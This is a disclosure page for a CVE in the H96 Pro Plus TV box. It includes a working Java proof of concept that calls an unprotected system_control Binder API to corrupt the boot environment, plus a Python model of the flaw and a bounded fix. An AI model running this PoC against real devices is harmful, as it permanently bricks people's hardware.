CVE-2020-21405: TVBoxBugs/H96_Pro_Plus_SmartTV_Vulnerability at master · helloworldxp/TVBoxBugs
An issue was discovered in the H96 Smart TV Box H96 Pro Plus that allows attackers to corrupt files via calls to the saveDeepColorAttr service.
[Vulnerability in H96 Pro Plus Smart TV Box]
I would like to report a security vulnerability in the H96 Smart TV Box (specs: H96 Pro Plus Smart TV Box, Android 7.1, 2GB/16GB, Amlogic S912 Octa Core, 1000M LAN, 3D 4K Mini PC Streaming Player with Dual WiFi 2.4GHz/5GHz, Bluetooth 4.1).
The vulnerability allows an attacker to render the device completely unusable by invoking an API with certain parameters a large number of times (>10000). Each invocation writes to a critical system file under "dev/block/env", so after enough repetitions the boot environment settings become corrupt. As a result, the device can no longer boot, not even in safe mode.
We suspect the vulnerability affects other Amlogic devices that expose the same vulnerable API.
This vulnerability is due to the following:
The device adds a custom API, "saveDeepColorAttr", to the SystemControl system service. It takes two string arguments. The API is not protected at all (no permission or caller check), so any third-party app can invoke it. On each invocation the second string argument is appended to the file (dev/block/env). After a sufficiently large number of invocations, the file is corrupt.
We can cause the problem by invoking the following method repeatedly:
import android.os.IBinder;
import android.os.Parcel;
import java.lang.reflect.Method;

static void callSaveDeepColorAttr() throws Exception {
    // Resolve the hidden android.os.ServiceManager via reflection and fetch the
    // "system_control" Binder; no permission is needed for this lookup.
    Class<?> serviceManager = Class.forName("android.os.ServiceManager");
    Method getService = serviceManager.getMethod("getService", String.class);
    IBinder mRemote = (IBinder) getService.invoke(null, "system_control");
    Parcel localParcel1 = Parcel.obtain();
    Parcel localParcel2 = Parcel.obtain();
    // The interface token must match the service descriptor or the call is rejected.
    localParcel1.writeInterfaceToken("droidlogic.ISystemControlService");
    localParcel1.writeString("1080p60hz");          // first argument
    localParcel1.writeString("RandomlyLongString"); // second argument, appended to dev/block/env
    mRemote.transact(0x2f, localParcel1, localParcel2, 0); // 0x2f corresponds to the API saveDeepColorAttr
    localParcel2.recycle();
    localParcel1.recycle();
}
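The report states that the second argument is appended to dev/block/env until the boot environment is corrupt, but does not show the partition layout or why an append eventually breaks boot. The following is an added example, written for this page and not taken from the report or from Amlogic's code. It assumes the partition is a standard U-Boot environment image (a 4-byte CRC32 header followed by NUL-terminated KEY=VALUE entries, padded to a fixed partition size); the partition size, the key name "deepcolor_attr" and the initial variables are placeholders. It contrasts an unbounded append-and-rewrite, which the report's behaviour matches, with the bounded replace-in-place write a hardened service would perform after checking the caller's permission.

```python
import binascii
import struct
from typing import Dict, Optional

# Assumed partition size for the model; the real size of dev/block/env is not
# stated in the report. The smaller sizes used when calling these functions
# only make the failure appear after fewer calls.
ENV_SIZE = 0x10000


def build_env(env: Dict[str, str], size: int = ENV_SIZE) -> bytes:
    """Serialize in the standard U-Boot env layout: a 4-byte little-endian CRC32
    over the data area, then NUL-terminated KEY=VALUE entries, an empty entry as
    terminator, and zero padding up to `size`. Refuses data that does not fit."""
    body = b"".join(f"{k}={v}".encode() + b"\0" for k, v in env.items()) + b"\0"
    if len(body) > size - 4:
        raise ValueError(f"env data is {len(body)} bytes, partition holds {size - 4}")
    body = body.ljust(size - 4, b"\0")
    return struct.pack("<I", binascii.crc32(body) & 0xFFFFFFFF) + body


def parse_env(image: bytes, size: int = ENV_SIZE) -> Dict[str, str]:
    """The bootloader-side read: check the length and CRC, then decode entries.
    A ValueError here is the state in which the box no longer boots."""
    if len(image) != size:
        raise ValueError("unexpected env image length")
    (crc,) = struct.unpack("<I", image[:4])
    body = image[4:]
    if binascii.crc32(body) & 0xFFFFFFFF != crc:
        raise ValueError("env CRC mismatch")
    env: Dict[str, str] = {}
    for entry in body.split(b"\0"):
        if not entry:          # the empty entry terminates the list
            break
        key, _, value = entry.partition(b"=")
        env[key.decode()] = value.decode()
    return env


def naive_save(image: bytes, key: str, value: str, size: int = ENV_SIZE) -> bytes:
    """Model of the reported behaviour: every call appends a fresh entry (no
    replace, no size check), recomputes the CRC over the grown buffer, and writes
    it to a fixed-size block device, which silently drops everything past `size`.
    Once the buffer outgrows the partition, the stored CRC no longer matches the
    truncated data and the bootloader rejects the image."""
    entries = image[4:].rstrip(b"\0") + b"\0"        # existing entries, padding removed
    body = entries + f"{key}={value}".encode() + b"\0" + b"\0"
    body = body.ljust(size - 4, b"\0")                 # pads short data, never truncates
    grown = struct.pack("<I", binascii.crc32(body) & 0xFFFFFFFF) + body
    return grown[:size]                                # the block-device write


def bounded_save(image: bytes, key: str, value: str, size: int = ENV_SIZE) -> bytes:
    """What a hardened service should do after its caller permission check:
    replace the key in place and refuse an update that would not fit, so the
    partition never receives a truncated image."""
    env = parse_env(image, size)
    env[key] = value
    return build_env(env, size)


def calls_until_unbootable(n_calls: int, value: str, size: int = ENV_SIZE) -> Optional[int]:
    """Drive naive_save repeatedly, the way the PoC drives saveDeepColorAttr, and
    return the call number at which the bootloader-side check first fails
    (None if the image survives all n_calls)."""
    image = build_env({"bootdelay": "1", "outputmode": "1080p60hz"}, size)
    for i in range(1, n_calls + 1):
        image = naive_save(image, "deepcolor_attr", value, size)   # placeholder key name
        try:
            parse_env(image, size)
        except ValueError:
            return i
    return None


if __name__ == "__main__":
    print("first failing call:", calls_until_unbootable(200, "RandomlyLongString", 4096))
```

With a 4 KiB model partition the naive writer breaks the image after a few hundred calls; with a real partition and the short strings of the PoC the count is correspondingly larger, which is consistent with the report's figure of more than 10000 invocations. The bounded writer never grows the image, so repeating it any number of times leaves a valid environment, and an oversize value is rejected before anything touches the partition.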